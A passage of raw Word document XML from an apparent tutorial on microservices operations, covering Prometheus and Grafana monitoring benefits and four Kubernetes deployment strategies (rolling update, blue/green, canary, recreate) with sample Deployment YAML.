          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>CPU and memory usage</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for each service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="529CB2D0"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Additionally, you can set </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>alerts</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> to notify you if any service's error rate exceeds a threshold or if latency becomes too high, so you can take action proactively.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6084B10C" w14:textId="77777777" w:rsidR="00D056EB"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1906654">
          <v:rect id="_x0000_i2844" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D89113E"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Benefits of Using Prometheus and Grafana for Microservices Monitoring:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E676956"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Scalability</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus scales well in microservices architectures, where services are constantly added or removed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10410513"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Real-Time Insights</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus enables real-time monitoring of service health and performance, and Grafana provides intuitive visualizations for easy analysis.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="296C750F"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Alerting</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: With both Prometheus and Grafana, you can set up automated alerts for operational anomalies, ensuring that you can respond to issues promptly.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="40D37B0B"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Unified View</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Grafana aggregates data from multiple services and data sources, giving you a unified view of your entire system's health and performance.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C24307D"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Flexible Querying</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Prometheus's powerful query language (PromQL) allows you to generate detailed insights into service behavior, while Grafana helps visualize these insights.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6364D691" w14:textId="77777777" w:rsidR="00D056EB"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BB258D0">
          <v:rect id="_x0000_i2845" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E886A7E"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Conclusion</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="426A3A3E"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Prometheus</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Grafana</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> are essential tools for monitoring microservices applications. Prometheus is responsible for collecting and storing metrics from microservices, while Grafana provides powerful visualization capabilities. Together, they offer a comprehensive solution for real-time monitoring, performance tracking, and alerting, helping developers and operators maintain the health and performance of distributed systems in a microservices architecture.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74FE8216" w14:textId="57402EFD" w:rsidR="00115965" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0011596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C7247FA">
          <v:rect id="_x0000_i2846" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D1591F1" w14:textId="578A46B6" w:rsidR="00615C7B" w:rsidRPr="00CE4B95" w:rsidRDefault="004A58EE">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="685" w:name="_Toc196308165"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Kubernetes deployment strategies for microservices</w:t>
      </w:r>
      <w:r w:rsidR="00615C7B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="685"/>
    </w:p>
    <w:p w14:paraId="6E503C1B" w14:textId="5E6A839C" w:rsidR="00D056EB" w:rsidRPr="00FA65E9" w:rsidRDefault="00D056EB" w:rsidP="00FA65E9">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:num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Kubernetes provides a variety of deployment strategies to ensure that microservices are reliably deployed, updated, and scaled within a cluster. These strategies help minimize downtime, reduce risks during updates, and ensure that services are always available.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171EBEC3"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Here are the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>key Kubernetes deployment strategies</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> commonly used in microservices:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1189087F" w14:textId="77777777" w:rsidR="00D056EB"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8091D1E">
          <v:rect id="_x0000_i2847" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="5117B8D1"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1. Rolling Update</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="161A0B1C"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Rolling Update</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is the most common deployment strategy used in Kubernetes. It ensures that new versions of microservices are deployed gradually, one pod at a time, so that the application stays available during the update process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0028FB35"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F39BF0D"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Kubernetes updates the pods in a controlled manner.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2563224E"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The old pods are gradually replaced with the new ones, ensuring that a minimum number of pods remain running at all times.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6727BE42"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The update process continues until all old pods have been replaced with the new version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7ABAE575"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F01A087"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Zero downtime, as the update is gradual.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C7851F5"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Easy to roll back to the previous version if issues occur.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1EECE1AC"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Example Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="009A49C5"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Microservices update</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Updating a microservice (e.g., a payment service) while ensuring that it remains functional and available throughout the process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A0CCC94"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lastRenderedPageBreak/>
        <w:t>Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="18112495"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apiVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="64B52CC3"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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="15831D5E"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="620A6188"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name: payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="434C9C10"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D0BDCBD"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replicas: 3</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B203113"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1D078DD5"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matchLabels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="45D8D575"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app: payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A81C25F"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template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F0A7A52"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="60038463"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labels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01FAB9B0"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app: payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AB241C0"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="739107B0"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1DE0F0D4"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 name: payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5983AFFC"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image: payment-service:v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C032E84"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="111C3ADF"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 containerPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030B4A57"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strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="632FB076"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type: RollingUpdate</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="37919C4D"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rollingUpdate:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="682602FF"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maxUnavailable: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="154DE65A"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maxSurge: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="688ACBE1" w14:textId="77777777" w:rsidR="00D056EB"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0AEED94">
          <v:rect id="_x0000_i2848" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FBC77FE"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2. Blue/Green Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C540B69"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In </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blue/Green Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">, two environments are maintained: the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Blue</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment (current live version) and the </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Green</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> environment (new version). The traffic is switched from the old version (Blue) to the new version (Green) when the new version is verified to be stable.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F46A790"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0497393A"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Two identical environments (Blue and Green) are set up.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="387B0790"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The Blue environment runs the current stable version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62DE0091"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The Green environment runs the new version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79C8B209"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After testing and verification, the traffic is switched to the Green environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2362EAAC"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If issues arise in the Green environment, traffic can be easily switched back to the Blue environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24D19570"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="175EB212"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Easy rollback: If the new version in the Green environment has issues, you can easily switch back to Blue.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26E221D9"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Zero downtime and low risk for production deployments.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C395C58"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Example Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F9885FE"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High-risk updates</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: When you are updating critical microservices such as payment processing services and want to ensure minimal risk.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29593BF0"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Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5F5D37C8"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Deploy the new version of the service in the Green environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1631EC72"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Switch the service traffic to the Green environment using a Kubernetes Service or Ingress.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="14487D66"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Once verified, remove or scale down the Blue environment.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BFF7D6F" w14:textId="77777777" w:rsidR="00D056EB"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1DD0CE7">
          <v:rect id="_x0000_i2849" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="537BDAD3"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3. Canary Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51869FC7"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Canary Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> involves rolling out a new version of a service to a small subset of users (canary group) before releasing it to the entire user base. This strategy minimizes the risk of introducing errors by testing new versions with a limited number of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34AC67F1"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="551C4970"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A small portion of the traffic is routed to the new version of the service (the canary).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="393A3311"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If the canary version performs well, the new version is gradually rolled out to a larger portion of users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08C5E3CD"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If issues are detected with the canary, the rollout is halted, and the previous version remains in use.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2AC0F409"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="475EB876"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lastRenderedPageBreak/>
        <w:t>Reduces the risk of introducing bugs by testing with a smaller audience.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17D773BE"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Easier to troubleshoot, as issues can be isolated to the canary users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7FF094"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Example Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A3D2C38"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Microservices feature release</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Rolling out a new feature in a microservice to a small user base first, like a new checkout process in an e-commerce service.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07D61AA4"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Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BC8C531"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You can use </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Kubernetes labels</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> or </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Istio</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> for traffic splitting. For example, you could direct 90% of traffic to the stable version (Blue) and 10% to the new version (Green):</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2041CACF"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apiVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="170E3128"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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="168089B9"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C304EE7"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name: myservice-canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="444FE5CF"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="483013A2"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replicas: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="776E1B18"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selector:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5612617A"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matchLabels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A32659B"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app: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1A70AE72"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template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FE11BA9"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29EF10D7"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labels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5365D80E"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app: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="051E63A9"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version: canary</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="79E20450"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6ECC5A8F"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30BB1690"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 name: myservice</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145D5A79"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image: myservice:v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5C64845C"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1736A44D"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 containerPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2649E083" w14:textId="77777777" w:rsidR="00D056EB"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844ADFE">
          <v:rect id="_x0000_i2850" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B36C074"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4. Recreate Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7E820B30"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A </w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Recreate Deployment</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> strategy involves terminating all the existing pods before starting new ones. This can cause some downtime during the update process, but it can be useful when there are specific requirements, like database schema changes, which necessitate that all pods be replaced at once.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DF423C0"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How It Works:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A0C6B91"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Kubernetes first kills all the running pods.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="49878C51"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Then it creates new pods with the updated version.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="701ED5F7"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Benefits:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A035D10"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Useful when the application requires a clean restart.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1E16243A"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Simpler to implement for applications that do not require high availability during the update process.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="527890BF"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Example Use Case:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7655DAC2"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Applications with database schema migrations</w:t>
      </w:r>
      <w:r w:rsidRPr="00FA65E9">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: If your microservice is making significant changes to the database schema that require a fresh start.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="56B6297B"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Implementation:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="256227D4"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apiVersion: apps/v1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="419EC92E"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kind: Deployment</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0398C966"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1772FFCF"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name: payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="31CC730E"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0B66A52C"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replicas: 1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BDB4E97"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template:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2762ED3E"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metadata:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="19343D11"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labels:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04176AFA"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app: payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="116FBC55"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spec:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0698D59C"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containers:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30477526"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 name: payment-service</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4066047A"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lastRenderedPageBreak/>
        <w:t xml:space="preserve">          image: payment-service:v2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24C695B6"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ports:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="716A3557"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 containerPort: 8080</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128D3CB9"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strategy:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F5F5142"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type: Recreate</w:t>
      </w:r>
    </w:p>
